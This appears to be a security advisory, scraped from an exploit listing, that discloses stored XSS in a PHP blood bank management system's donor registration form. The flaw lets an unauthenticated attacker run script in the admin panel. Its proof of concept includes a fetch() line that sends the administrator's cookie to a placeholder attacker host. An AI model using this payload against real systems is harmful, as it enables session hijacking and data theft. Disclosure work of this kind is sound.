## https://sploitus.com/exploit?id=67D1405E-74E3-587B-8622-B1EB2286E6ED
# Stored XSS in BloodBank Managing System โ Donor Registration (Unauthenticated โ Admin Panel)
## Details
| Field | Value |
|---|---|
| **Vendor** | Code-Projects |
| **Vendor URL** | https://code-projects.org |
| **Product** | BloodBank Managing System in PHP |
| **Product URL** | https://code-projects.org/bloodbank-managing-system-in-php-with-source-code/ |
| **Version** | latest as of april 2026 |
| **Vulnerability** | Stored Cross-Site Scripting (XSS) |
| **CWE** | CWE-79 |
| **CVSSv3 Score** | 8.8 (High) |
| **Attack Vector** | Network |
| **Auth Required** | None (Public donor registration) |
| **Victim** | Administrator |
| **User Interaction** | Required (Admin visits panel) |
| **Researcher** | Imad Alvi |
| **Date** | 2026-04-13 |
---
## Affected Component
- **File:** `Blood_Bank/Donor_reg.php`
- **Parameters:**
- `name`
- `contact-1`
- `contact-2`
- **Triggered on:**
- `Blood_Bank/admin_ndonor.php` (Not Active Donors)
---
## Description
The BloodBank Managing System fails to properly sanitize user-supplied input in the donor registration functionality. An unauthenticated attacker can inject malicious JavaScript payloads into multiple input fields such as **Name** and **Contact fields**.
These payloads are stored in the backend database and later rendered in the **Admin Panel (Not Active Donors section)** without proper output encoding.
When an administrator views the donor list, the injected payload executes in their browser, leading to **session hijacking, privilege escalation, and full admin account compromise**.
This vulnerability represents a critical attack vector because:
- No authentication is required to inject payloads
- Execution occurs in a privileged admin context
---
## Proof of Concept
### Step 1 โ Access Donor Registration (No Authentication Required)
Navigate to:
http://localhost/Blood_Bank/Donor_reg.php
---
### Step 2 โ Inject XSS Payload
Fill the donor registration form and inject the payload into vulnerable fields:
the attacker can also put this as payload and get cookie on their server
```html
fetch("http://ATTACKER-IP:8000/?c="+document.cookie)
```
### Step 3 - go to admin and then go to Not Active Donor Details
the xss payload executes there
---
### impact
Using this cookie, the attacker can:
* Hijack admin session
* Access admin dashboard
* Perform privileged actions
* Modify or delete donor data
* Fully compromise the application
---
### Reference
* CWE-79: Improper Neutralization of Input During Web Page Generation
* OWASP XSS Guide
* [Code-Projects BloodBank System](https://code-projects.org/bloodbank-managing-system-in-php-with-source-code/)